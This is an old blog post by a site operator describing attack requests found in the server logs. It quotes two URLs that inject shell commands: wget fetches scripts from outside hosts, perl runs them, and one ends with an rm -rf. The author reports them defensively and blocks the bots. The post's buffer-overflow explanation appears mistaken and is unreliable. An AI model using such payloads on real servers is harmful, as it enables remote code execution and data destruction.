You Keep A-Knockin’ But You Can’t Come In
Our server logs are showing quite a surge of attempted exploits today. Most of them are dumb hacks I’ve seen many times before, but there’s also a new one (at least to me); a script was requesting pages with URLs like this (I’ve added spaces to allow the string to wrap):
/weblog/weblog.php//weblog/?archive=112003&PHPSESSID= Image: spy.gif /spybot.txt;wget%20visualcoders.net; wget%20visualcoders.net /php.txt;wget%20visualcoders.net; wget%20visualcoders.net /zone.txt;perl%20spybot.txt;perl%20worm1.txt; perl%20ownz.txt;perl%20php.txt
There are thousands of these requests in our logs, sometimes up to a dozen in the same second. The user agent is always “LWP::Simple/5.xxx” so it’s a Perl script using the LWP library to make HTTP requests. I couldn’t find any reference to this on Google; do any of our server admin types know what’s up?
For now I’ve added the user agents that were doing this to our .htaccess list of bad bots, because it’s obviously someone up to no good.
UPDATE at 12/26/04 9:24:00 am:
Not to worry, lizardoids; LGF is not vulnerable to this attack.
Interestingly, there already seems to be a mutation of this script; our logs also show a large number of requests that look like this:
/article/Image: php.gif? “”https://20midomain.false.ca/~pillar/.zk/”>20midomain.false.ca sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%20midomain.false.ca sess_189f0f0889555397a4de5485dd611113; perl%20sess_189f0f0889555397a4de5485dd611113; wget%20midomain.false.ca sess_189f0f0889555397a4de5485dd611112; perl%20sess_189f0f0889555397a4de5485dd611112; wget%20midomain.false.ca sess_189f0f0889555397a4de5485dd611114; perl%20sess_189f0f0889555397a4de5485dd611114; rm%20-rf%20sess_189f0f0889555397a4de5485dd611113
… etc. etc.
This appears to be an attempt to cause a buffer overflow in the page request field.